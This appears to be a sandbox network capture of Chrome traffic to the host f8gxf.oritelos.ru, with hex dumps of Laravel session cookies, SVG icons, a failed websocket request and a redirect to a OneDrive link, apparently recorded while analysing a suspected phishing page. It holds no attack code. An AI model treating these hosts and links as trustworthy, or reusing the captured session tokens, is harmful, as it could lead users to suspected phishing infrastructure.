                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJRwns74H%2B9vetZdgq%2B7C8FRjAQcLaZ1zenz2XP5EllrPxkgdnNkPyr8BqQGntvIgQwgnH7IzGRpdZo5VJElOQ4VYPhsuQu0Td4NFa3mvVSpYMB5s7xvOOZAAP5kEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; expires=Thu, 30-May-2024 12:21:14 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                2024-05-30 10:21:14 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 34 78 4c 30 68 4c 4e 6a 6c 6a 59 55 46 6c 52 44 67 78 52 6a 68 59 57 6b 35 4c 52 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 33 70 6a 5a 30 70 50 51 6b 74 53 5a 30 31 75 64 32 31 35 57 43 39 31 52 33 52 68 5a 46 42 55 54 54 42 4e 62 55 52 4f 56 6b 74 42 53 44 46 6f 59 6a 42 72 57 57 5a 31 51 31 6c 4a 64 31 55 32 54 54 68 4a 63 45 78 31 56 6b 70 6e 57 6a 52 79 53 32 31 79 55 32 46 43 55 58 46 4b 5a 30 56 44 51 55 70 4a 52 6c 46 76 59 6c 52 45 4b 33 45 72 53 6c 46 4b 63 6d 6b 35 61 7a 5a 79 5a 32 39 52 5a 55 30 76 4e 44 46 31 4e 6b 70 74 64 6c 70 36 5a 6c 46 59 4c 32 78 34 62 30 74 6c 57 46 56 61 55 33 67 35 4d 45 6c 4b 5a 32 38
                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28
                                                2024-05-30 10:21:14 UTC87INData Raw: 35 31 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 31 64 72 76 2e 6d 73 5c 2f 62 5c 2f 73 21 41 70 50 48 66 57 67 30 5f 43 63 43 62 31 31 6e 62 4a 66 72 38 36 4c 53 6e 68 73 22 7d 0d 0a
                                                Data Ascii: 51{"expired":0,"redirecturl":"https:\/\/1drv.ms\/b\/s!ApPHfWg0_CcCb11nbJfr86LSnhs"}
                                                2024-05-30 10:21:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                53192.168.2.449802188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:13 UTC1451OUTGET /yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab180 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:13 UTC671INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:13 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab180"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPZeXu0jixNmY%2FMVqiDDvQwbXVFJveo40tQY7yb8QlULcY2TI1zc1LZJx07tKPFMy4aK%2BF4V5EDf9tb%2BFmz0ro0UbB9DxakT01zIMi3KUvvw9x4yPTYDPUb1c6aGEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfefdbadfc3ff-EWR
                                                2024-05-30 10:21:13 UTC698INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                2024-05-30 10:21:13 UTC1369INData Raw: 32 2e 32 2c 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c
                                                Data Ascii: 2.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,
                                                2024-05-30 10:21:13 UTC845INData Raw: 2e 37 35 38 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39
                                                Data Ascii: .758l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279
                                                2024-05-30 10:21:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                54192.168.2.449805188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:13 UTC1287OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://f8gxf.oritelos.ru
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                Sec-WebSocket-Key: Rt7K0lK8LYeW+ERTFM2ZsA==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-05-30 10:21:13 UTC583INHTTP/1.1 400 Bad Request
                                                Date: Thu, 30 May 2024 10:21:13 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wgfqYFqEuUqUdo%2B02z6oCDAR7H7xG4gVpPDmltulbXvs2PMH5hM22z1LU%2BdXOK3phGsK46wZ8mOKaggNFG1i%2BxapUJkHR6du6HA%2Bah7dSNEDKhmI1dwidKUioK3JFLwnHh4Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 88bdfefed94832e4-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:21:13 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                Data Ascii: 22{"code":3,"message":"Bad request"}
                                                2024-05-30 10:21:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                55192.168.2.449804188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:13 UTC1443OUTGET /opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd199 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:14 UTC667INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:14 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd199"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yKbAfvNrjzzl9nJx9HGccafEhKx8XMPv7VdUp%2BrhrXPBrDiasv67T6WA%2FVkKy6k70kC3musYklfIy37mDWI%2FYQ9m9%2BBXL8c4W1UilYzjhCkWd3dMUHkS2YVvH%2B9OJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfefe9950431a-EWR
                                                2024-05-30 10:21:14 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                2024-05-30 10:21:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                56192.168.2.449807188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:13 UTC1118OUTGET /mnq9zg5en0UR6op8OO6uGL6YZg61eBRuv044uU7ylswf1pghT78145 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:14 UTC663INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:14 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="mnq9zg5en0UR6op8OO6uGL6YZg61eBRuv044uU7ylswf1pghT78145"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FbEjLILR86V8w%2FeFhR79U4b9zDdu%2FAx0%2Bq2gr6Z0ioWI%2F6fWfKX0VZEETl0%2F7iDX1hISwlx1TR4M1DOf2VJ6X7Hw8feARTowRcZnz%2F4kVJ4N4OZBypPrSrZA7o5ftQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff0229314356-EWR
                                                2024-05-30 10:21:14 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                2024-05-30 10:21:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                57192.168.2.449806188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:13 UTC1441OUTGET /gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM12207 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:14 UTC660INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:14 GMT
                                                Content-Type: image/png
                                                Content-Length: 49602
                                                Connection: close
                                                Content-Disposition: inline; filename="gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM12207"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pETvocN4xq%2FuEi3POBCBJTyqojjBa%2FZRSk844H%2Fs%2BjBKjmHj6y1soseqYhVK1SSMRHuOnSUwdCPPC7UZp65dxEir%2FpyJiL5LxI8j7BQKq3ZhvyYTHYblh%2B%2FTViVBZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff0218c31a24-EWR
